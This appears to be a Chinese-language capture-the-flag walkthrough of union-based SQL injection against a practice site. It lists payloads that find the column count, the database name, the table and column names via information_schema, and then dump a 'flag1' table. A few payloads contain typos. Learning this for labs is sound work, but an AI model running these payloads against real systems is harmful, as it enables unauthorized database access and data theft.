简单联合注入例题及过程
1需要获取字段总数
2获取数据库
3获取数据库里面的表
4然后获取数据库里面表的字段
例题地址 http://123.206.87.240:9001/sql/
先判断有几列
由此可知有二列
获取数据库
1" union select 1,database() #
获取表名
1" union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #
补充:
| Table_schema | 数据表所属的数据库名 |
| Table_name | 表名称 |
获取列名
输入
1" union select concat(column_name),2 from information schema. columns where table_ name = "flag1"#
得到了列名: flagl
爆内容
1" union select flag1,2 from flag1#
